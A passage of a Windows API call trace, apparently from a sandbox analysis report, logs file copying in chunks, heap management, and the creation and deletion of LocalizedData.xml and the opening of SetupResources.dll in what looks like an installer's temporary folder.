lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.918] GetLastError () returned 0x0 [0067.918] SetLastError (dwErrCode=0x0) [0067.919] GetLastError () returned 0x0 [0067.919] SetLastError (dwErrCode=0x0) [0067.919] GetLastError () returned 0x0 [0067.919] SetLastError (dwErrCode=0x0) [0067.919] GetLastError () returned 0x0 [0067.919] SetLastError (dwErrCode=0x0) [0067.919] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.919] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.919] GetLastError () returned 0x0 [0067.919] SetLastError (dwErrCode=0x0) [0067.919] GetLastError () returned 0x0 [0067.919] SetLastError (dwErrCode=0x0) [0067.920] GetLastError () returned 0x0 [0067.920] SetLastError (dwErrCode=0x0) [0067.920] GetLastError () returned 0x0 [0067.920] SetLastError (dwErrCode=0x0) [0067.920] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.920] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.920] GetLastError () returned 0x0 [0067.920] SetLastError (dwErrCode=0x0) [0067.920] GetLastError () returned 0x0 [0067.920] SetLastError (dwErrCode=0x0) [0067.920] GetLastError () returned 0x0 [0067.920] SetLastError (dwErrCode=0x0) [0067.921] GetLastError () returned 0x0 [0067.921] SetLastError (dwErrCode=0x0) [0067.921] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.921] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.922] GetLastError () returned 0x0 [0067.922] SetLastError (dwErrCode=0x0) [0067.922] GetLastError () returned 0x0 [0067.922] SetLastError (dwErrCode=0x0) [0067.922] GetLastError () returned 0x0 [0067.922] SetLastError (dwErrCode=0x0) [0067.922] GetLastError () returned 0x0 [0067.922] SetLastError (dwErrCode=0x0) [0067.922] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.922] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.923] GetLastError () returned 0x0 [0067.923] SetLastError (dwErrCode=0x0) [0067.923] GetLastError () returned 0x0 [0067.923] SetLastError (dwErrCode=0x0) [0067.923] GetLastError () returned 0x0 [0067.923] SetLastError (dwErrCode=0x0) [0067.923] GetLastError () returned 0x0 [0067.923] SetLastError (dwErrCode=0x0) [0067.923] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.923] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.923] GetLastError () returned 0x0 [0067.923] SetLastError (dwErrCode=0x0) [0067.924] GetLastError () returned 0x0 [0067.924] SetLastError (dwErrCode=0x0) [0067.924] GetLastError () returned 0x0 [0067.924] SetLastError (dwErrCode=0x0) [0067.924] GetLastError () returned 0x0 [0067.924] SetLastError (dwErrCode=0x0) [0067.924] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.924] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.924] GetLastError () returned 0x0 [0067.924] SetLastError (dwErrCode=0x0) [0067.924] GetLastError () returned 0x0 [0067.924] SetLastError (dwErrCode=0x0) [0067.925] GetLastError () returned 0x0 [0067.925] SetLastError (dwErrCode=0x0) [0067.925] GetLastError () returned 0x0 [0067.925] SetLastError (dwErrCode=0x0) [0067.925] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.925] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.925] GetLastError () returned 0x0 [0067.925] SetLastError (dwErrCode=0x0) [0067.925] GetLastError () returned 0x0 [0067.925] SetLastError (dwErrCode=0x0) [0067.925] GetLastError () returned 0x0 [0067.925] SetLastError (dwErrCode=0x0) [0067.926] GetLastError () returned 0x0 [0067.926] SetLastError (dwErrCode=0x0) [0067.926] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.926] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.926] GetLastError () returned 0x0 [0067.926] SetLastError (dwErrCode=0x0) [0067.926] GetLastError () returned 0x0 [0067.926] SetLastError (dwErrCode=0x0) [0067.926] GetLastError () returned 0x0 [0067.926] SetLastError (dwErrCode=0x0) [0067.926] GetLastError () returned 0x0 [0067.926] SetLastError (dwErrCode=0x0) [0067.927] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.927] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.927] GetLastError () returned 0x0 [0067.927] SetLastError (dwErrCode=0x0) [0067.927] GetLastError () returned 0x0 [0067.927] SetLastError (dwErrCode=0x0) [0067.927] GetLastError () returned 0x0 [0067.927] SetLastError (dwErrCode=0x0) [0067.927] GetLastError () returned 0x0 [0067.927] SetLastError (dwErrCode=0x0) [0067.927] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.928] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.928] GetLastError () returned 0x0 [0067.928] SetLastError (dwErrCode=0x0) [0067.928] GetLastError () returned 0x0 [0067.928] SetLastError (dwErrCode=0x0) [0067.928] GetLastError () returned 0x0 [0067.928] SetLastError (dwErrCode=0x0) [0067.928] GetLastError () returned 0x0 [0067.928] SetLastError (dwErrCode=0x0) [0067.928] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.929] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.929] GetLastError () returned 0x0 [0067.929] SetLastError (dwErrCode=0x0) [0067.929] GetLastError () returned 0x0 [0067.929] SetLastError (dwErrCode=0x0) [0067.929] GetLastError () returned 0x0 [0067.929] SetLastError (dwErrCode=0x0) [0067.929] GetLastError () returned 0x0 [0067.929] SetLastError (dwErrCode=0x0) [0067.929] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.929] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.930] GetLastError () returned 0x0 [0067.930] SetLastError (dwErrCode=0x0) [0067.930] GetLastError () returned 0x0 [0067.930] SetLastError (dwErrCode=0x0) [0067.930] GetLastError () returned 0x0 [0067.930] SetLastError (dwErrCode=0x0) [0067.930] GetLastError () returned 0x0 [0067.930] SetLastError (dwErrCode=0x0) [0067.930] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0xa82, lpOverlapped=0x0) returned 1 [0067.930] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.930] GetLastError () returned 0x0 [0067.930] SetLastError (dwErrCode=0x0) [0067.931] GetLastError () returned 0x0 [0067.931] SetLastError (dwErrCode=0x0) [0067.931] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0067.931] GetLastError () returned 0x0 [0067.931] SetLastError (dwErrCode=0x0) [0067.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7d070 [0067.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0067.931] GetLastError () returned 0x0 [0067.931] SetLastError (dwErrCode=0x0) [0067.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d720 | out: hHeap=0x20000) returned 1 [0067.931] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0xa90, lpOverlapped=0x0) returned 1 [0067.931] GetLastError () returned 0x0 [0067.931] SetLastError (dwErrCode=0x0) [0067.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0067.931] GetLastError () returned 0x0 [0067.932] SetLastError (dwErrCode=0x0) [0067.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0067.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0067.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0067.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0067.932] CloseHandle (hObject=0x420) returned 1 [0067.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.934] CloseHandle (hObject=0x410) returned 1 [0067.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0067.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0067.934] AreFileApisANSI () returned 1 [0067.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b68 [0067.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 45 [0067.935] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0067.936] GetFileType (hFile=0x410) returned 0x1 [0067.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0067.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.936] GetLastError () returned 0xb7 [0067.936] SetLastError (dwErrCode=0xb7) [0067.936] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0068.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0068.048] CloseHandle (hObject=0x410) returned 1 [0068.048] AreFileApisANSI () returned 1 [0068.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0068.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 45 [0068.049] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml")) returned 1 [0068.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0068.050] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.050] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.050] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0068.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0068.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0068.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0068.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0068.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0068.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0068.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0068.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0068.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0068.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0068.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0068.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0068.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0068.051] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.051] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.051] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.051] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0068.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.051] AreFileApisANSI () returned 1 [0068.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0068.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0068.051] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.051] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0068.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0068.051] AreFileApisANSI () returned 1 [0068.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71bd0 [0068.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 46 [0068.052] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.052] GetFileType (hFile=0x410) returned 0x1 [0068.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0068.052] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0068.052] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0068.052] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0068.052] CloseHandle (hObject=0x410) returned 1 [0068.053] AreFileApisANSI () returned 1 [0068.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0068.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 46 [0068.053] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.053] GetFileType (hFile=0x410) returned 0x1 [0068.053] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0068.053] CloseHandle (hObject=0x410) returned 1 [0068.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0068.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0068.053] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 